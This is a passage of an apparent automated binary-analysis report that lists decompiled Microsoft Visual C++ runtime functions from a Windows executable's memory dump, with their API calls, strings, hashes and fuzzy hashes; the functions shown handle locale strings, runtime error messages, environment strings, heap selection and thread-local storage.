							_t45 =  *0x40d150; // 0x0
						}
						_t5 =  &_a16; // 0x406d59
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12,  *_t5);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x408580, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x40857c, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x40d16c = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x00406bb9
0x00406bbb
0x00406bc0
0x00406bcb
0x00406bcc
0x00406bd3
0x00406bd9
0x00406bdc
0x00406be5
0x00406c25
0x00406c28
0x00406c51
0x00000000
0x00406c57
0x00406c5a
0x00406c5c
0x00406c61
0x00406c61
0x00406c71
0x00406c7b
0x00406c81
0x00406c86
0x00000000
0x00406c88
0x00406c88
0x00406c95
0x00406c9a
0x00406c9d
0x00406c9f
0x00406ca5
0x00406cba
0x00406cc0
0x00000000
0x00406cc2
0x00406cd1
0x00406cd9
0x00000000
0x00406cdb
0x00406cdb
0x00406ce3
0x00406ce3
0x00406cd9
0x00406cc0
0x00406c86
0x00406c2a
0x00406c2a
0x00406c2f
0x00406c31
0x00406c31
0x00406c36
0x00406c43
0x00406c43
0x00406be7
0x00406bea
0x00406bed
0x00406bfd
0x00406c17
0x00406ceb
0x00406ceb
0x00406c1d
0x00406c1f
0x00000000
0x00406c1f
0x00406bff
0x00406bff
0x00406c20
0x00406c20
0x00000000
0x00406c20
0x00406bfd
0x00406cf3
0x00406cfe

APIs

GetStringTypeW.KERNEL32(00000001,00408580,00000001,?,73B770F0,0040D2CC,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406BF5
GetStringTypeA.KERNEL32(00000000,00000001,0040857C,00000001,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406C0F
GetStringTypeA.KERNEL32(?,?,?,?,Ym@,73B770F0,0040D2CC,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406C43
MultiByteToWideChar.KERNEL32(?,0040D2CD,?,?,00000000,00000000,73B770F0,0040D2CC,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406C7B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00406D59,?), ref: 00406CD1
GetStringTypeW.KERNEL32(?,?,00000000,Ym@,?,?,?,?,?,?,00406D59,?), ref: 00406CE3

Strings

Ym@, xrefs: 00406CDB, 00406C36

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: StringType$ByteCharMultiWide
String ID: Ym@
API String ID: 3852931651-983799895
Opcode ID: 19edb6d76af0899a1d615053b388bc96e37f978f5937c59ba0655f7f61e4d907
Instruction ID: 0c826d932dab6a2b35537ad75a382305a03d7104addcdec2b18846f1db506b26
Opcode Fuzzy Hash: 19edb6d76af0899a1d615053b388bc96e37f978f5937c59ba0655f7f61e4d907
Instruction Fuzzy Hash: 5A418F71904209AFDF209F94CE85AAB7F79FB08750F11443AF942F6290C7388924CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403F49, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403F49(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x40a1b8;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x40a248) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x40a1b8; // 0x9c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x40cf5c; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x40a0ec == 1) {
						_t16 = _t54 + 0x40a1bc; // 0x40849c
						_t56 = _t16;
						_t19 = E00405A30( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00405940( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00405A30( &_v424) + 1 > 0x3c) {
								_t49 = E00405A30( &_v424) +  &_v424 - 0x3b;
								E00406650(E00405A30( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00405940( &_v164, "Runtime Error!\n\nProgram: ");
							E00405950( &_v164, _t49);
							E00405950( &_v164, "\n\n");
							_t12 = _t54 + 0x40a1bc; // 0x40849c
							E00405950( &_v164,  *_t12);
							_t17 = E004065BF( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00403f49
0x00403f52
0x00403f55
0x00403f57
0x00403f5c
0x00403f60
0x00403f63
0x00403f69
0x00000000
0x00000000
0x00000000
0x00403f69
0x00403f6e
0x00403f71
0x00403f77
0x00403f7d
0x00403f85
0x00404076
0x00404076
0x00404081
0x00404093
0x00403f9c
0x00403fa2
0x00403fbe
0x00403fcc
0x00403fd2
0x00403fd9
0x00403fdb
0x00403feb
0x00404006
0x0040400e
0x00404013
0x00404013
0x00404022
0x0040402f
0x00404040
0x00404045
0x00404052
0x00404068
0x00404070
0x00403fa2
0x00403f85
0x0040409b

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00403FB6
GetStdHandle.KERNEL32(000000F4,0040849C,00000000,00000000,00000000,?), ref: 0040408C
WriteFile.KERNEL32(00000000), ref: 00404093

Strings

..., xrefs: 00404008
<program name unknown>, xrefs: 00403FC6
Runtime Error!Program: , xrefs: 0040401C
Microsoft Visual C++ Runtime Library, xrefs: 00404062

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: f4d49badb77c75cacfad7ea4599639127be344c80b5209b02cb9855a447d923b
Instruction ID: 6e217ef30637fb527e41127d46efc14c3263da1eec37f3ca93dc6c0e739c8d79
Opcode Fuzzy Hash: f4d49badb77c75cacfad7ea4599639127be344c80b5209b02cb9855a447d923b
Instruction Fuzzy Hash: E631D6B2A00209AFDF20EA60CD49F9B376CEB85304F54057FF645F61C1E6789A548E5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040396F, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040396F() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x40d0a8; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E004028A0(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405EA0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E004028A0(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004027B7(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x40d0a8 = 2;
					goto L18;
				}
				 *0x40d0a8 = 1;
				goto L6;
			}

0x00403971
0x00403980
0x00403982
0x00403984
0x00403988
0x004039c0
0x00403a4a
0x00403a98
0x00000000
0x00403a98
0x00403a4c
0x00403a4e
0x00403a5c
0x00403a5e
0x00403a60
0x00403a6c
0x00403a6f
0x00403a77
0x00403a7c
0x00403a85
0x00403a7e
0x00403a7e
0x00403a7e
0x00403a8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a62
0x00403a62
0x00403a62
0x00403a62
0x00403a63
0x00403a67
0x00403a68
0x00000000
0x00403a62
0x00403a56
0x00403a5a
0x00000000
0x00000000
0x00000000
0x00403a5a
0x004039c6
0x004039c8
0x004039d6
0x004039d9
0x004039db
0x004039eb
0x004039f7
0x004039fe
0x00403a04
0x00403a08
0x00403a0b
0x00403a13
0x00403a17
0x00403a28
0x00403a2e
0x00403a34
0x00403a34
0x00403a38
0x00403a38
0x00403a17
0x00403a3d
0x00000000
0x00000000
0x00000000
0x00000000
0x004039dd
0x004039dd
0x004039dd
0x004039de
0x004039df
0x004039e5
0x004039e6
0x00000000
0x004039dd
0x004039cc
0x004039d0
0x00000000
0x00000000
0x00000000
0x004039d0
0x0040398c
0x00403990
0x004039a4
0x004039a8
0x00000000
0x00000000
0x004039ae
0x00000000
0x004039ae
0x00403992
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402713), ref: 0040398A
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402713), ref: 0040399E
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402713), ref: 004039CA
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402713), ref: 00403A02
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402713), ref: 00403A24
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,00402713), ref: 00403A3D
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402713), ref: 00403A50
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A8E

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 3341c1a57459a73859af4784913d8ac99d631b977b33b036abde2fc917227607
Instruction ID: f460362602db22cf29a542334e4414209dd7254ade1229447c787021adc6b272
Opcode Fuzzy Hash: 3341c1a57459a73859af4784913d8ac99d631b977b33b036abde2fc917227607
Instruction Fuzzy Hash: A53146B26042116FD7207FB85D8883B7E9CEA4531A715053FF5C6F3280EA798E458B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C8A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00403C8A(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E00406590(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00403C5D( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00406550("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E004064D0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00406410(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E004061D5(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}

0x00403c92
0x00403c9f
0x00403cb1
0x00403cc7
0x00000000
0x00403cc7
0x00403ce6
0x00403dbc
0x00403dc0
0x00403dca
0x00000000
0x00403dcc
0x00403cee
0x00403cfa
0x00403cfc
0x00403cfc
0x00403d00
0x00403d08
0x00403d08
0x00403d0a
0x00403d0b
0x00403cfc
0x00403d27
0x00403d3e
0x00403d4a
0x00403d50
0x00403d52
0x00403d52
0x00403d56
0x00403d5e
0x00403d5e
0x00403d60
0x00403d61
0x00403d52
0x00403d73
0x00403d29
0x00403d29
0x00403d29
0x00403d7c
0x00000000
0x00000000
0x00403d81
0x00403d8a
0x00000000
0x00000000
0x00403d8c
0x00403d8d
0x00403d91
0x00403d93
0x00403d96
0x00403d9c
0x00403d98
0x00403d98
0x00403d98
0x00403d9d
0x00403d93
0x00403da5
0x00403db0
0x00000000
0x00000000
0x00403dd1

APIs

GetVersionExA.KERNEL32 ref: 00403CA9
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403CDE
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403D3E

Strings

__GLOBAL_HEAP_SELECTED, xrefs: 00403D18
__MSVCRT_HEAP_SELECT, xrefs: 00403CD9

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: db2cf84cef6e4ca526c92d22917466c07231cabb2b10c38645a922e115710fe6
Instruction ID: 55c59d92e378af30fba6bc2bd7e960bf012ff3464936cafb4907c14ccb8b8aff
Opcode Fuzzy Hash: db2cf84cef6e4ca526c92d22917466c07231cabb2b10c38645a922e115710fe6
Instruction Fuzzy Hash: F331C6729252486AEB319B746C457DA3F6D9F02705F2404FBD185F62C2E6388F898B19

Uniqueness

Uniqueness Score: -1.00%

Function 004076E0, Relevance: 7.5, APIs: 5, Instructions: 45
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004076E0(void* __ecx, CHAR* _a4) {
				void* _v12;
				int _t11;
				signed int _t13;
				void* _t16;
				short* _t17;
				int _t19;
				short* _t21;

				_t16 = __ecx;
				if(_a4 != 0) {
					_t19 = lstrlenA(_a4) + 1;
					E00406590(_t19 + _t19 + 0x00000003 & 0x000000fc, _t16);
					_t17 = _t21;
					 *_t17 =  *_t17 & 0x00000000;
					_t11 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t17, _t19);
					if(_t11 == 0) {
						if(GetLastError() == 0) {
							_t13 = 0;
						} else {
							_t13 = GetLastError() & 0x0000ffff | 0x80070000;
						}
						_t11 = E00407633(_t13);
					}
					__imp__#2(_t17);
				} else {
					_t11 = 0;
				}
				return _t11;
			}

0x004076e0
0x004076e9
0x004076fa
0x00407703
0x00407708
0x00407711
0x00407719
0x00407721
0x0040772d
0x0040773d
0x0040772f
0x00407736
0x00407736
0x00407740
0x00407740
0x00407746
0x004076eb
0x004076eb
0x004076eb
0x00407752

APIs

lstrlenA.KERNEL32(00000000,?,00000000,?,00401AD9,?), ref: 004076F2
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001,?,00401AD9,?), ref: 00407719
GetLastError.KERNEL32(?,00000001,?,00401AD9,?), ref: 00407729
GetLastError.KERNEL32(?,00000001,?,00401AD9,?), ref: 0040772F
SysAllocString.OLEAUT32 ref: 00407746

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocByteCharMultiStringWidelstrlen
String ID:
API String ID: 4196186757-0
Opcode ID: 14b5ab40ad701a1db41f0c62696fd2f68177238879e5b48fb871eb66ca77113b
Instruction ID: 465f2ade59e499a35ae17807cde62dad826a670bf9900979c7f86515a37c42d8
Opcode Fuzzy Hash: 14b5ab40ad701a1db41f0c62696fd2f68177238879e5b48fb871eb66ca77113b
Instruction Fuzzy Hash: 0C01F432944515A7CB201B21DD05BAB3FA8EF413A0F20043AF945F61D0EB38B52586FE

Uniqueness

Uniqueness Score: -1.00%

Function 004032B3, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032B3() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x40a100);
				if(_t16 == 0) {
					_t16 = E004057E5(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x40a100, _t16) == 0) {
						E0040276E(0x10);
					} else {
						E004032A0(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x004032c1
0x004032c9
0x004032cd
0x004032d8
0x004032de
0x00403308
0x004032f1
0x004032f2
0x004032f8
0x004032fe
0x00403302
0x00403302
0x004032de
0x0040330f
0x00403319

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,00406D04,004063A3,00000000,?,?,00000000,00000001), ref: 004032B5
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 004032C3
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0040330F

Part of subcall function 004057E5: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,004032D8,00000001,00000074,?,?,00000000,00000001), ref: 004058DB

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 004032E7
GetCurrentThreadId.KERNEL32 ref: 004032F8

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 0cd5b81671e5551e27e5e7f433cb1ce47f0171a5748ab77f5bca613d86b239ec
Instruction ID: 8e20eb8c947cb56eb6538e6e935b47e269c6269d4d562eacc360eefd0f0f03c9
Opcode Fuzzy Hash: 0cd5b81671e5551e27e5e7f433cb1ce47f0171a5748ab77f5bca613d86b239ec
Instruction Fuzzy Hash: A4F0BB35A00B219BD6312F31BF0EB1A3E54EF057B2B11063EF981B62D0CF788811865D

Uniqueness

Uniqueness Score: -1.00%

Function 00406A7B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00406A7B() {
				int _t41;
				int _t51;
				short* _t53;
				void* _t54;
				int _t59;
				void* _t60;
				short* _t62;

				_t62 =  *(_t60 - 0x18);
				 *(_t60 - 0x24) = 0;
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				_t51 =  *(_t60 - 0x1c);
				if( *(_t60 - 0x24) == 0) {
					L8:
					_t41 = 0;
				} else {
					_t8 = _t60 + 0x14; // 0x406d59
					if(MultiByteToWideChar( *(_t60 + 0x20), 1,  *(_t60 + 0x10),  *_t8,  *(_t60 - 0x24), _t51) == 0) {
						goto L8;
					} else {
						_t59 = LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24), _t51, 0, 0);
						 *(_t60 - 0x28) = _t59;
						if(_t59 == 0) {
							goto L8;
						} else {
							if(( *(_t60 + 0xd) & 0x00000004) == 0) {
								 *(_t60 - 4) = 1;
								E00406590(_t59 + _t59 + 0x00000003 & 0x000000fc, _t54);
								 *(_t60 - 0x18) = _t62;
								_t53 = _t62;
								 *(_t60 - 0x20) = _t53;
								 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
								if(_t53 == 0 || LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24),  *(_t60 - 0x1c), _t53, _t59) == 0) {
									goto L8;
								} else {
									_push(0);
									_push(0);
									if( *(_t60 + 0x1c) != 0) {
										_push( *(_t60 + 0x1c));
										_push( *(_t60 + 0x18));
									} else {
										_push(0);
										_push(0);
									}
									_t59 = WideCharToMultiByte( *(_t60 + 0x20), 0x220, _t53, _t59, ??, ??, ??, ??);
									if(_t59 == 0) {
										goto L8;
									} else {
										goto L17;
									}
								}
							} else {
								if( *(_t60 + 0x1c) == 0 || _t59 <=  *(_t60 + 0x1c) && LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24), _t51,  *(_t60 + 0x18),  *(_t60 + 0x1c)) != 0) {
									L17:
									_t41 = _t59;
								} else {
									goto L8;
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0x10));
				return _t41;
			}

0x00406a7b
0x00406a80
0x00406a83
0x00406a87
0x00406a8d
0x00406af5
0x00406af5
0x00406a8f
0x00406a93
0x00406aa6
0x00000000
0x00406aa8
0x00406aba
0x00406abc
0x00406ac1
0x00000000
0x00406ac3
0x00406ac7
0x00406b09
0x00406b18
0x00406b1d
0x00406b20
0x00406b22
0x00406b25
0x00406b3f
0x00000000
0x00406b59
0x00406b5c
0x00406b5d
0x00406b5e
0x00406b64
0x00406b67
0x00406b60
0x00406b60
0x00406b61
0x00406b61
0x00406b7a
0x00406b7e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b7e
0x00406ac9
0x00406acc
0x00406b84
0x00406b84
0x00000000
0x00000000
0x00000000
0x00406acc
0x00406ac7
0x00406ac1
0x00406aa6
0x00406afd
0x00406b08

APIs

MultiByteToWideChar.KERNEL32(0000000A,00000001,?,?,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406A9E
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406AB4
LCMapStringW.KERNEL32(?,?,00000000,00000000,?,?,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406AE7
LCMapStringW.KERNEL32(?,?,00000000,?,?,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406B4F
WideCharToMultiByte.KERNEL32(0000000A,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00406D59,?), ref: 00406B74

Strings

Ym@, xrefs: 00406A93

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID: Ym@
API String ID: 352835431-983799895
Opcode ID: 0c7727a35f3d2a6c64c548d4000b1fc14add49525af54c34e056693e9adbca60
Instruction ID: 90aa8f12682ce98fd24065ddf6bda3a6ed4d6a0e27dce41ff8fb7d7797b8f12a
Opcode Fuzzy Hash: 0c7727a35f3d2a6c64c548d4000b1fc14add49525af54c34e056693e9adbca60
Instruction Fuzzy Hash: CF112872900209AFDF229F94CD04ADEBBB5FB48350F11816AFA15B21A0D7369D61DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00407304, Relevance: 6.5, APIs: 5, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00407304(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x408710);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x40d528; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x40d524, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x40d118 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E0040534F(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
